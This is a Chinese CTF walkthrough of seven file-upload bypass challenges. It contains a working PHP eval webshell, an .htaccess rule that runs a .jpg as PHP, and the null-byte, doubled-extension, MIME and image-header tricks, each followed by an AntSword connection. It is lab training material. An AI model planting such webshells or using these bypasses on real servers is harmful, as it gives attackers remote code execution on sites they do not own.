目录
1.无验证
进入环境,
无限制的话,我们直接上传php文件的一句话木马:
<?php @eval($_POST['a'])?>
获得了上传文件相对路径,打开HacBar:
加上上传文件相对路径,勾选post data,用phpinfo查看木马是否存活:
a=phpinfo();
出现这个就代表成功上传了木马并且存活,现在可以打开蚁剑:
复制网址到URL地址,密码是a :
测试一下连接,添加即可:
flag就在flag这个文件夹中:
ok,成功获取了flag。
2.前端验证
开启环境,尝试上传php格式的一句话木马:
前端验证就是把特定的文件类型屏蔽了,无法直接上传php, 这里我把他改成.jpg试试
可以看到,一句话木马.jpg上传成功,可以打开burp suite进行抓包:
在这里将jpg后缀改成php,点击send:
将上传文件路径复制下来:
用HacBar检查木马是否存活:
记得带上路径 :upload/1.php
然后打开蚁剑:
添加数据 ,
可以直观的看到,我们上传的1.php在里面存活 ,我们就是通过这个木马文件进行的。
在这个目录下发现flag,双击进去就可以看到flag。
3.htaccess验证
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能
先上传htaccess文件,然后上传jpg格式文件,让他以php的格式执行。
先上传 .htaccess :
<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
再上传一句话木马1.jpg:
用蚁剑连接即可。
4.MIME验证
上传一句话木马,抓包:
将jpg后缀改为php然后send,得到文件路径,再用蚁剑连接:
成功得到flag。
5.文件头检查
试着直接传木马jpg文件发现行不通:
它检测头文件,那我们上传一自己随便画的图:
用bp爆出来:
在图片中加入木马:
<?php @eval($_POST['a']);?>
用蚁剑连接即可:
6. 00截断
0x00字符串是结束表示符,可以利用它来把后面的内容截断。
将一句话木马改为文件名1.php.jpg进行上传
用bp抓包:
在上方的/upload/后面加1.php%00.jpg
下方filename也改为1.php%00.jpg,接下来用蚁剑连接即可,路径就是upload/1.php:
7.双写后缀
这题看一下源码,
php会被过滤,但是只过滤一次,所以双写成:1.pphphp
他过滤了一个php,结果变成了1.php:
用蚁剑连接:
获得flag。
感谢您的观看!